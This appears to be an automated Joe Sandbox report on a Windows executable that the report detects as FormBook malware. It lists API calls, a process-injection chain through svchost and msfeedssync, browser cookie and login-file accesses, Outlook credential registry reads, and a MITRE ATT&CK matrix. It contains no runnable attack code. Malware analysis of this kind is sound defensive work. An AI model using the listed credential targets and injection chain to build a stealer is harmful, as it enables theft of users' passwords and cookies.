Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_006348D7

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00694C7F mouse_event,

0_2_00694C7F

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Transferencia 6997900002017937.exe"	Jump to behavior
Source: C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\6tskSK4rGcXjRtb8E.exe	Process created: C:\Windows\SysWOW64\msfeedssync.exe "C:\Windows\SysWOW64\msfeedssync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00687CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00687CAF

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_0068874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0068874B

Source: Transferencia 6997900002017937.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 6tskSK4rGcXjRtb8E.exe, 00000005.00000000.1558126238.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3848042601.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3848080036.0000000000E80000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: Transferencia 6997900002017937.exe, 6tskSK4rGcXjRtb8E.exe, 00000005.00000000.1558126238.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3848042601.0000000000E90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 6tskSK4rGcXjRtb8E.exe, 00000005.00000000.1558126238.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3848042601.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3848080036.0000000000E80000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: 6tskSK4rGcXjRtb8E.exe, 00000005.00000000.1558126238.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3848042601.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000002.3848080036.0000000000E80000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_0065862B cpuid

0_2_0065862B

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00664E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00664E87

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00671E06 GetUserNameW,

0_2_00671E06

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00663F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00663F3A

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006349A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3850615861.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848322186.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3847177486.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1633217878.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1632740851.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848223982.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3848379688.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1637325490.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msfeedssync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Transferencia 6997900002017937.exe	Binary or memory string: WIN_81
Source: Transferencia 6997900002017937.exe	Binary or memory string: WIN_XP
Source: Transferencia 6997900002017937.exe	Binary or memory string: WIN_XPe
Source: Transferencia 6997900002017937.exe	Binary or memory string: WIN_VISTA
Source: Transferencia 6997900002017937.exe	Binary or memory string: WIN_7
Source: Transferencia 6997900002017937.exe	Binary or memory string: WIN_8
Source: Transferencia 6997900002017937.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3850615861.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848322186.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3847177486.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1633217878.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1632740851.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848223982.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3848379688.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1637325490.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_006A6283
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_006A6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Transferencia 6997900002017937.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Transferencia 6997900002017937.exe